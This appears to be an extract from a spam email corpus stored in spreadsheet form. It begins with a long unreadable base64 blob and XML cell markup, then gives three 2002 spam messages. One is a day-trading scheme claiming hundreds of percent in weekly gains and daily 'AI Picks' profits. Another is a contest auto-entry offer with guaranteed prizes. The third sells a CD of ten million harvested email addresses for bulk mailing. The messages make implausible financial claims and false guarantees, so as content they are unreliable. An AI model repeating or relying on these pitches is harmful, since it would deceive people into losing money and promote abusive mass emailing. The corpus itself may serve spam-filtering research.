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</t>
  </si>
  <si>
    <t>5396</t>
  </si>
  <si>
    <t>To: Investor &lt;investors@data56.com&gt;\nFrom: Investor Relations &lt;trade1944@eudoramail.com&gt;\nDate: Tue, 23 Jul 2002 17:03:58 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:03:58 +0100</t>
  </si>
  <si>
    <t>Investor Relations &lt;trade1944@eudoramail.com&gt;</t>
  </si>
  <si>
    <t>Investor &lt;investors@data56.com&gt;</t>
  </si>
  <si>
    <t>LazyTraders; LDT 342%, Chatroom $455,000, AI Stockpicks 348% this week.</t>
  </si>
  <si>
    <t>LazyTraders, Even when the Market takes a 300 odd point dive you can still make money in the Stock Market if you know what you are doing. If you don't know what you are doing follow people who do. This week You could have made: Up to 392% using The Lazy DayTrader System. One Stock that you would have found immediately was a stock that was trading at .55, until a large company announced that it was offering $1.10 for the shares. What do you think happened to the value of the Shares? Within the same day they went up to $1.10. 100% profit in one day! There were 3 more examples like it this week which you would have found within 5 seconds with the Lazy DayTrader System. Learn how to do this at: [URL]http://lazytrader.get.to[/URL] Our Chatroom this week made $455,000 trading 1000 shares with no losing days. If you want to learn about Fibonacci Numbers and Elliott Waves join the Chatroom for $199 per month and watch Mr G for a while before trading with him to learn his methods. Some comments from Friday's Chatroom: "bones&gt; G and Chat, good job as usual.  You helped me make 2400.00 in closed trades the past 2 days just trading 2    and 3 lots.  ditto that I'm 2350 in 4 days only using 3 lot. Thanks G, you two guys are the greatest.    Deepest thanks to you, G &amp; C,  my numbers are great for the month and week.  Up 2000 + on week, $8000 + on month.  Never happened for me before!    thanks G, it's your doing, I just tag along. I'm up 25 points today!"   If you want to use StockPicking Software to tell you when there is a buy and when to sell, subscribe to our AI Picks for $299 per month. Our AI Picks produced 39.8% average profit every day this week. It produces both long and shorting opportunities.  You can start trading with as little as $500 from 8 AM EST until 8 PM EST. Have a nice day. Frank vanderlugt [URL]http://lazytrader.get.to[/URL] If our server is down go to any Search Engine and type "lazy daytrader" To be removed just send an email to: lazytrader@ultimateemail.com Or fax us at: 808-575-7312 Please understand that the decision to buy or sell any security is done purely at your own risk. Under no circumstances will we, owners, officers, or employees be held liable for any losses incurred by the use of information contained in the Lazy DayTrading System. Please recognize that investing in stocks includes risk and that the past performance of a stock is not necessarily an indicator of future gains. The person or persons utilizing this service herein known as "subscriber" acknowledges that he/she fully understands that the risk factor is high in trading and that only "Risk Capital" or "Risk Funds" should be used in such trading. A person who does not have extra Risk Capital, or Risk Funds, that they can afford to lose, should not trade in the market. No "SAFE" trading system has ever been devised, and no one including us can guarantee profits or freedom from loss. We are not brokers or stock advisors. Please understand that the information provided in The Lazy DayTrading System is for educational purposes only and that we are not recommending any securities to be bought or sold. The information provided by The Lazy DayTrading System is for the personal use of the members only.</t>
  </si>
  <si>
    <t>http://lazytrader.get.to http://lazytrader.get.to</t>
  </si>
  <si>
    <t>5402</t>
  </si>
  <si>
    <t>To: cypherpunks@einstein.ssz.com\nFrom: Ebargains &lt;ebargains@reply.mb00.net&gt;\nDate: Tue, 23 Jul 2002 14:34:01 EDT</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:34:01 EDT</t>
  </si>
  <si>
    <t>Ebargains &lt;ebargains@reply.mb00.net&gt;</t>
  </si>
  <si>
    <t>Michael asked me to send this to you.</t>
  </si>
  <si>
    <t>| Hi,  \n  \nWant to increase your chances of winning a big jackpot in those Internet\ncontests?  \n  \nMichael Khalili, the famous programmer who you may have read about in USA\nToday and other newspapers, came up with a method that makes it **_hundreds of\ntimes easier to win online._**  \n  \nHe recently wrote a program that will AUTOMATICALLY enter you in online\ncontests--over and over UNTIL YOU WIN (or tell it to stop). We at Grab.com are\nso excited by this system that we're putting it online for our members to use.  \n  \n  \nTHE PRIZE IS YOURS - GUARANTEED!  \n  \nIf you win a contest using this program, the prize is legally yours to keep--\nGUARANTEED! Our lawyers assured us that Michael's program is legal, and online\ncontest sponsors have CONFIRMED that it doesn't violate their rules. **_So if\nyou win a prize, you'll receive it. If you don't receive it, we'll pay you\nourselves. GUARANTEED._**  \n  \n  \nFREE TO USE.  \n  \nBest of all, this service is free to use. All you pay for is related network\nexpenses--which only cost $1 for 7 days of the service. That's dozens of\nentries for what you'd usually pay to get a single lottery ticket!  \n  \nAs a member in good standing of this mailing, **_we've already set up the\nautomatic entry system for you._** All that's left is for you to turn it on.\nOnce you do, you can sit back and watch it enter you into contest after\ncontest after contest after contest....  \n  \n  \nClick here to begin!  \n  \nP.S. This system will continue to enter you into hundreds of free contests\nuntil you win (or cancel it).  \n  \nP.P.S. All the prizes you win are yours to keep--GUARANTEED!  \n  \n  \n  \n  \n  \n  \n  \n(C) Copyright Grab.com 2002.  \n---  \n  \n  \n_Remove yourself from this list by either:_  \n---  \nEntering your email address below and clicking REMOVE:  \n  \n**_OR_**  \nReply to this message with the word "remove" in the subject line.  \nThis message was sent to address cypherpunks@einstein.ssz.com\n\npmguid:1dx.2qbm.fsi52\n\n  \n![pmg]([URL]http://r.mb00.net[/URL]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r.mb00.net http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>5392</t>
  </si>
  <si>
    <t>To: cpunks@minder.net\nFrom: POWERMAN10MILLION@hotmail.com\nDate: Tue, 23 Jul 2002 14:31:43</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 14:31:43</t>
  </si>
  <si>
    <t>POWERMAN10MILLION@hotmail.com</t>
  </si>
  <si>
    <t>10 million fresh email addresses sent to you on CD for FREE!!! TRY BEFORE YOU BUY!!</t>
  </si>
  <si>
    <t>GET READY FOR A DEAL YOU'VE NEVER SEEN BEFORE! 10 million hot fresh email addresses and much more! TRY BEFORE YOU BUY!!!!! WE WILL SEND YOU THE  POWERMAN 10 MILLION Internet Marketing Shop  CD FREE  This is what you get:  10 million freah email addresses Fully functional websites - ready to take orders  Proven high impact resalable products - ebooks Cutting edge internet marketing tools Instructions &amp; valuable links  Test The CD, when you're 100% satisfied that the CD is everything and more than it claims to be - then send $49.95 by check. money order or pay by credit card on our website. NO STRINGS ATTACHED - WE SEND YOU THE CD - IF YOU LIKE IT -  YOU PAY - IF YOU DON'T LIKE IT - SEND IT BACK If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD   email: POWERMAN10MILLION@hotmail.com Subject Line: SEND CD Your Mailing Address: 10 MILLION NEW Addresses - Just Released! &lt;&lt;&lt; THE VERY BEST email addresses available  anywhere!! Our research has found that many people have tried one or more of the following... Free Classifieds? (Don't work) Web Site? (Takes thousands of visitors) Banners? (Expensive and iffy) E-Zine? (They better have a huge list) Search Engines? (Easily buried with thousands of others) S O    W H A T   D O E S   W O R K ?  Although often misunderstood, there is one method  that has proven to succeed time-after-time. E - M A I L M A R K E T I N G ! ! Here's what the experts have to say about E-Mail Marketing: "A gold mine for those who can take advantage of mass e-mail programs" - The New York Times "E-mail is an incredible lead generation tool" -Crains Magazine "Blows away traditional Mailing"  - Advertising Age Here is an example of your potential earnings if you have a product that brings you a profit of around $30. Remember, on the Internet, you can make money 7 days a week, 24 hours a day... even while you sleep,  orders come from all over the world! Orders Per Day         Weekly Earnings             Monthly Earnings             Yearly Earnings        1                              $210.00                           $840.00                             $10,080.00        2                              $420.00                           $1,680.00                          $20,160.00        3                              $630.00                           $2,520.00                          $30,240.00        5                              $1,050.00                        $4,200.00                          $50,400.00      10                              $2,100.00                        $8,400.00                          $100,000.00      15                              $3,150.00                        $12,600.00                        $151,200.00 THE QUESTION IS... how do you generate those orders? THE POWERMAN 10 MILLION - TRY BEFORE YOU BUY THE POWERMAN 10 MILLION, is the  ABSOLUTE BEST product of its kind anywhere in the world today.  There are NO OTHER products  ANYWHERE that can compete with the quality of this CD.  If you want us to send you the POWERMAN 10 MILLION Internet Marketing Shop CD   email:  POWERMAN10MILLION@hotmail.com Subject Line: SEND CD Your Mailing Address: O N E   O F   A   K I N D This CD is a first. No one... and we mean NO ONE is shipping valuable CDs to customers before  they pay. What is different about this offering? The main difference is all you have to do is email us  the address to ship the CD to! You don't have to worry about getting ripped off. There is no risk to you. 